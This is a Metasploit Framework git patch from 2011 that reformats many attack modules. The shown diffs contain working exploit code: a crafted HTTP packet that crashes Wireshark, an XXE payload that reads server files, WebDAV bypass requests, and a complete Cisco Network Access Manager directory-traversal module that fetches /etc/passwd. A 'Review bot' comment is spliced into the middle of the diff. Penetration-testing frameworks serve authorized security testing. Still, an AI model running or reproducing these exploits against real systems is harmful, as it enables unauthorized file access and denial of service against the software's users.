From 62c8c6ea9fa27a1a36f8cb36282e5f81654eb494 Mon Sep 17 00:00:00 2001 
From: Joshua Drake Date: Sun, 23 Oct 2011 11:56:13 +0000 Subject: [PATCH] big msftidy pass, ping me if there are issues git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da --- modules/auxiliary/dos/wireshark/chunked.rb | 52 +- .../scanner/http/adobe_xml_inject.rb | 10 +- .../http/cisco_nac_manager_traversal.rb | 166 ++-- .../scanner/http/dir_webdav_unicode_bypass.rb | 4 +- .../http/ms09_020_webdav_unicode_bypass.rb | 4 +- modules/auxiliary/scanner/http/scraper.rb | 4 +- .../scanner/oracle/isqlplus_login.rb | 3 +- .../scanner/postgres/postgres_login.rb | 9 +- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 314 ++++---- .../scanner/sap/sap_mgmt_con_abaplog.rb | 0 .../scanner/sap/sap_mgmt_con_brute_login.rb | 0 .../scanner/sap/sap_mgmt_con_extractusers.rb | 0 .../scanner/sap/sap_mgmt_con_getenv.rb | 0 .../scanner/sap/sap_mgmt_con_getlogfiles.rb | 0 .../sap/sap_mgmt_con_getprocessparameter.rb | 384 +++++----- .../sap/sap_mgmt_con_instanceproperties.rb | 0 .../scanner/sap/sap_mgmt_con_listlogfiles.rb | 0 .../scanner/sap/sap_mgmt_con_startprofile.rb | 0 .../scanner/sap/sap_mgmt_con_version.rb | 0 .../scanner/sap/sap_service_discovery.rb | 0 modules/auxiliary/scanner/voice/recorder.rb | 4 +- modules/auxiliary/server/capture/smb.rb | 10 +- .../auxiliary/server/webkit_xslt_dropper.rb | 2 +- modules/auxiliary/spoof/wifi/airpwn.rb | 6 +- .../auxiliary/sqli/oracle/jvm_os_code_10g.rb | 14 +- modules/auxiliary/vsploit/pii/web_pii.rb | 4 +- .../linux/pptp/poptop_negative_read.rb | 5 +- .../exploits/multi/http/glassfish_deployer.rb | 20 +- .../solaris/sunrpc/sadmind_adm_build_path.rb | 4 +- .../exploits/solaris/sunrpc/sadmind_exec.rb | 4 +- .../unix/webapp/php_vbulletin_template.rb | 4 +- .../exploits/unix/webapp/php_xmlrpc_eval.rb | 4 +- .../adobe_shockwave_rcsl_corruption.rb | 7 +- .../windows/browser/citrix_gateway_actx.rb | 2 +- .../browser/mozilla_interleaved_write.rb | 4 +- .../windows/browser/mozilla_mchannel.rb | 6 +- 
.../browser/ms08_078_xml_corruption.rb | 20 +- .../windows/browser/ms10_002_aurora.rb | 5 +- .../browser/ms10_042_helpctr_xss_cmd_exec.rb | 4 +- .../browser/ms11_050_mshtml_cobjectelement.rb | 3 +- .../novelliprint_getdriversettings_2.rb | 2 +- .../exploits/windows/browser/pcvue_func.rb | 64 +- .../exploits/windows/browser/teechart_pro.rb | 46 +- .../email/ms10_045_outlook_ref_only.rb | 5 +- .../windows/fileformat/adobe_libtiff.rb | 5 +- .../fileformat/adobe_pdf_embedded_exe.rb | 4 +- .../fileformat/adobe_pdf_embedded_exe_nojs.rb | 3 +- .../windows/fileformat/deepburner_path.rb | 4 +- .../fileformat/esignal_styletemplate_bof.rb | 0 .../windows/fileformat/ezip_wizard_bof.rb | 14 +- .../fileformat/foxit_reader_filewrite.rb | 2 +- .../windows/fileformat/scadaphone_zip.rb | 11 +- modules/exploits/windows/http/hp_nnm_ovas.rb | 7 +- .../windows/http/hp_power_manager_filename.rb | 2 +- .../exploits/windows/http/osb_uname_jlist.rb | 1 + .../windows/misc/wireshark_packet_dect.rb | 3 +- .../payloads/singles/linux/armle/adduser.rb | 4 + modules/payloads/singles/linux/x64/exec.rb | 12 + .../singles/linux/x64/shell_bind_tcp.rb | 12 + .../singles/linux/x64/shell_reverse_tcp.rb | 12 + modules/payloads/singles/windows/exec.rb | 1 + .../payloads/singles/windows/loadlibrary.rb | 1 + .../payloads/stagers/java/reverse_https.rb | 2 +- .../payloads/stagers/linux/x64/bind_tcp.rb | 12 + .../payloads/stagers/linux/x64/reverse_tcp.rb | 12 + modules/payloads/stages/linux/x64/shell.rb | 12 + .../payloads/stages/osx/x86/bundleinject.rb | 1 + modules/payloads/stages/windows/dllinject.rb | 1 + .../stages/windows/patchupdllinject.rb | 1 + modules/post/multi/gather/dns_bruteforce.rb | 8 +- modules/post/multi/gather/dns_srv_lookup.rb | 38 +- modules/post/multi/gather/ping_sweep.rb | 6 +- modules/post/multi/manage/system_session.rb | 22 +- modules/post/windows/gather/arp_scanner.rb | 8 +- modules/post/windows/gather/bitcoin_jacker.rb | 2 +- modules/post/windows/gather/cachedump.rb | 2 +- 
.../gather/credentials/enum_cred_store.rb | 12 +- .../gather/credentials/filezilla_server.rb | 6 +- .../windows/gather/credentials/outlook.rb | 66 +- .../post/windows/gather/credentials/vnc.rb | 28 +- .../gather/credentials/windows_autologin.rb | 5 +- modules/post/windows/gather/dumplinks.rb | 4 +- modules/post/windows/gather/enum_dirperms.rb | 10 +- .../windows/gather/enum_ms_product_keys.rb | 29 +- modules/post/windows/gather/memory_grep.rb | 15 +- modules/post/windows/gather/reverse_lookup.rb | 14 +- modules/post/windows/gather/usb_history.rb | 8 +- modules/post/windows/manage/autoroute.rb | 6 +- modules/post/windows/manage/delete_user.rb | 6 +- plugins/db_credcollect.rb | 4 +- plugins/ips_filter.rb | 8 +- plugins/lab.rb | 197 ++--- plugins/msfd.rb | 4 +- plugins/nessus.rb | 719 +++++++++--------- plugins/nexpose.rb | 68 +- plugins/openvas.rb | 52 +- plugins/pcap_log.rb | 10 +- plugins/wmap.rb | 330 ++++---- plugins/xmlrpc.rb | 2 +- scripts/meterpreter/arp_scanner.rb | 22 +- scripts/meterpreter/autoroute.rb | 1 + scripts/meterpreter/checkvm.rb | 64 +- scripts/meterpreter/credcollect.rb | 1 + scripts/meterpreter/domain_list_gen.rb | 22 +- scripts/meterpreter/duplicate.rb | 6 +- scripts/meterpreter/enum_chrome.rb | 10 +- scripts/meterpreter/enum_firefox.rb | 54 +- scripts/meterpreter/enum_powershell_env.rb | 1 + scripts/meterpreter/enum_putty.rb | 1 + scripts/meterpreter/enum_vmware.rb | 5 +- scripts/meterpreter/event_manager.rb | 3 +- scripts/meterpreter/get_application_list.rb | 20 +- scripts/meterpreter/get_env.rb | 1 + scripts/meterpreter/get_filezilla_creds.rb | 7 +- scripts/meterpreter/get_local_subnets.rb | 11 +- scripts/meterpreter/get_valid_community.rb | 3 + scripts/meterpreter/getcountermeasure.rb | 9 +- scripts/meterpreter/gettelnet.rb | 4 +- scripts/meterpreter/hashdump.rb | 35 +- scripts/meterpreter/hostsedit.rb | 1 + scripts/meterpreter/keylogrecorder.rb | 2 +- scripts/meterpreter/killav.rb | 1 + scripts/meterpreter/metsvc.rb | 1 + 
scripts/meterpreter/migrate.rb | 1 + scripts/meterpreter/multi_console_command.rb | 46 +- scripts/meterpreter/multicommand.rb | 19 +- scripts/meterpreter/multiscript.rb | 1 + scripts/meterpreter/netenum.rb | 314 ++++---- scripts/meterpreter/panda_2007_pavsrv51.rb | 25 +- scripts/meterpreter/pml_driver_config.rb | 1 + scripts/meterpreter/powerdump.rb | 5 +- scripts/meterpreter/prefetchtool.rb | 15 +- scripts/meterpreter/process_memdump.rb | 24 +- scripts/meterpreter/remotewinenum.rb | 86 +-- scripts/meterpreter/scheduleme.rb | 1 + scripts/meterpreter/schelevator.rb | 1 + scripts/meterpreter/schtasksabuse.rb | 13 +- scripts/meterpreter/screen_unlock.rb | 6 +- scripts/meterpreter/screenspy.rb | 74 +- scripts/meterpreter/search_dwld.rb | 1 + .../service_permissions_escalate.rb | 404 +++++----- scripts/meterpreter/sound_recorder.rb | 2 +- scripts/meterpreter/srt_webdrive_priv.rb | 4 +- scripts/meterpreter/uploadexec.rb | 1 + .../meterpreter/virtualbox_sysenter_dos.rb | 2 + scripts/meterpreter/virusscan_bypass.rb | 413 +++++----- scripts/meterpreter/vnc.rb | 1 + scripts/meterpreter/webcam.rb | 4 +- scripts/meterpreter/win32-sshclient.rb | 1 + scripts/meterpreter/win32-sshserver.rb | 1 + scripts/meterpreter/winbf.rb | 146 ++-- scripts/meterpreter/wmic.rb | 4 +- scripts/shell/migrate.rb | 1 + scripts/shell/spawn_meterpreter.rb | 1 + tools/import_webscarab.rb | 3 +- tools/list_interfaces.rb | 10 +- tools/lm2ntcrack.rb | 80 +- tools/vxdigger.rb | 2 + tools/vxencrypt.rb | 4 +- tools/vxmaster.rb | 2 + 160 files changed, 2626 insertions(+), 2405 deletions(-) mode change 100755 => 100644 modules/auxiliary/scanner/http/scraper.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb mode change 
100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb 
mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb 
mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb 
mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb 
mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb 
mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_service_discovery.rb 
mode change 100755 => 100644 modules/exploits/multi/http/glassfish_deployer.rb 
mode change 100755 => 100644 modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb 
mode change 100755 => 100644 modules/payloads/singles/linux/armle/adduser.rb 
mode change 100755 => 100644 modules/post/windows/gather/bitcoin_jacker.rb 
mode change 100755 => 100644 scripts/meterpreter/get_valid_community.rb 
mode change 100755 => 100644 scripts/meterpreter/virusscan_bypass.rb 
diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb 
index 09101f28ce..a7af981094 100644 
--- a/modules/auxiliary/dos/wireshark/chunked.rb 
+++ b/modules/auxiliary/dos/wireshark/chunked.rb 
@@ -57,8 +57,56 @@ class Metasploit3 < Msf::Auxiliary p.tcp_sport = datastore['SPORT'].to_i p.tcp_window = 3072 - # That's some mighty fine ASCII right there. - p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x
20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a" + # The following hex blob contains an HTTP response with a chunked-encoding + # length of 0. The ASCII version is below in a block comment. + # + # We represent it like this to prevent tools from mangling the carriage + # returns within it. 
+ # + p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" + + "\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" + + "\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" + + "\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" + + "\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" + + "\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" + + "\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" + + "\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" + + "\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" + + "\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" + + "\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" + + "\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" + + "\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" + + "\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" + + "\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" + + "\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" + + "\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" + + "\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" + + "\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" + + "\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" + + "\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" + + "\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" + + "\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" + + "\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" + + "\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" + + "\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" + + "\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" + + 
"\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" + + "\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" + + "\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" + + "\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" + + "\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" + + "\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" + + "\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" + + "\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" + + "\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" + + "\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" + + "\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" + + "\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" + + "\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" + + "\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" + + "\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" + + "\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" + + "\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a" p.recalc capture_sendto(p, rhost) diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index fe34ed4507..f8d7fec7e4 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb 
@@ -64,7 +64,15 @@ class Metasploit3 < Msf::Auxiliary
 "/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL
 ]
- postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>bodyclientIdcorrelationIddestinationheadersmessageIdoperationtimestamptimeToLiveDSIdDSMessagingVersionnil1&x3;500"
+ postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"
+ postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"
+ postrequest << ""
+ postrequest << ""
+ postrequest << "bodyclientIdcorrelationIddestination"
+ postrequest << "headersmessageIdoperationtimestamp"
+ postrequest << "timeToLive"
+ postrequest << "DSIdDSMessagingVersionnil"
+ postrequest << "1&x3;500"
 path.each do | check | 
diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb 
index 3cc13337db..c366eca294 100644 
--- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb 
+++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb 
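Review bot: The `\?` and `\!` in the first two added lines are not escape sequences in a Ruby double-quoted string; they evaluate to a plain `?` and `!` and survive only as noise, so the lines read more plainly as `postrequest = '<?xml version="1.0" encoding="utf-8"?>'` and `postrequest << "<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"` with identical output. On that second line `datastore['FILE']` is dropped into the SYSTEM literal with no XML quoting, so a FILE value containing a double quote yields a malformed DOCTYPE rather than a clean error; a one-line comment stating that FILE is expected to be a bare path would make that assumption visible. The enclosing method starts before and continues past this hunk.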
@@ -1,84 +1,84 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::WMAPScanServer - include Msf::Auxiliary::Scanner - - def initialize - super( - 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', - 'Version' => '$Revision$', - 'Description' => %q{ - This module tests whether a directory traversal vulnerablity is present - in versions of Cisco Network Access Manager 4.8.x You may wish to change - FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment. - }, - 'References' => - [ - [ 'CVE', '2011-3305' ], +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::WMAPScanServer + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', + 'Version' => '$Revision$', + 'Description' => %q{ + This module tests whether a directory traversal vulnerablity is present + in versions of Cisco Network Access Manager 4.8.x You may wish to change + FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment. 
+ }, + 'References' => + [ + [ 'CVE', '2011-3305' ], [ 'OSVDB', '76080'], - [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ], - [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ] - ], - 'Author' => [ 'nenad' ], - 'License' => MSF_LICENSE - ) - - register_options( - [ - Opt::RPORT(443), - OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']), - OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]), - ], self.class) - end - - def run_host(ip) - - traversal = '../../' - part1= '/admin/file_download?tag=' - part2 = '&fileType=snapshot' - - begin - print_status("Attempting to connect to #{rhost}:#{rport}") - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => '/admin', - }, 25) - - if (res) - 1.upto(datastore['MAXDIRS']) do |level| - try = traversal * level - traversalstring = part1 + try + datastore['FILE'] + part2 - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => traversalstring, - }, 25) - if (res and res.code == 200) - print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}") - break - elsif (res and res.code) - print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n") - end - end - end - - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE - end - end -end + [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ], + [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ] + ], + 'Author' => [ 'nenad' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(443), + OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']), + OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]), + ], self.class) + end + + def run_host(ip) + + traversal = '../../' + part1= '/admin/file_download?tag=' + part2 = '&fileType=snapshot' + + begin + 
print_status("Attempting to connect to #{rhost}:#{rport}") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => '/admin', + }, 25) + + if (res) + 1.upto(datastore['MAXDIRS']) do |level| + try = traversal * level + traversalstring = part1 + try + datastore['FILE'] + part2 + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => traversalstring, + }, 25) + if (res and res.code == 200) + print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}") + break + elsif (res and res.code) + print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n") + end + end + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 3fd7f56921..6899c59509 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -124,7 +124,9 @@ class Metasploit3 < Msf::Auxiliary return if not conn - webdav_req = %q|| + webdav_req = '' + + '' + + '' File.open(datastore['DICTIONARY'], 'rb').each do |testf| begin diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index e8409a2b63..2f8ea1a9f3 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -59,7 +59,9 @@ class Metasploit3 < Msf::Auxiliary vhost = datastore['VHOST'] || wmap_target_host prot = datastore['SSL'] ? 'https' : 'http' - webdav_req = %q|| + webdav_req = '' + + '' + + '' begin res = send_request_cgi({ diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb old mode 100755 new mode 100644 index 138a884a1f..fc3cabca95 
--- a/modules/auxiliary/scanner/http/scraper.rb 
+++ b/modules/auxiliary/scanner/http/scraper.rb 
@@ -1,5 +1,5 @@
 ##
-# $Id: $
+# $Id$
 ##
 ##
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
 def initialize
 super(
 'Name' => 'HTTP Page Scraper',
- 'Version' => '$Revision: 13183 $',
+ 'Version' => '$Revision$',
 'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
 'Author' => ['et'],
 'License' => MSF_LICENSE 
diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb 
index 5f1b3ad6f5..7dff63cfcc 100644 
--- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb 
+++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb 
@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Auxiliary
 OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
 OptString.new('SID', [ false, 'Oracle SID' ]),
 OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
- OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
+ OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
 OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
 ], self.class) 
diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb 
index 25e0cbc1d2..1b98d6b0f6 100644 
--- a/modules/auxiliary/scanner/postgres/postgres_login.rb 
+++ b/modules/auxiliary/scanner/postgres/postgres_login.rb 
@@ -40,9 +40,12 @@ class Metasploit3 < Msf::Auxiliary
 register_options(
 [
- OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
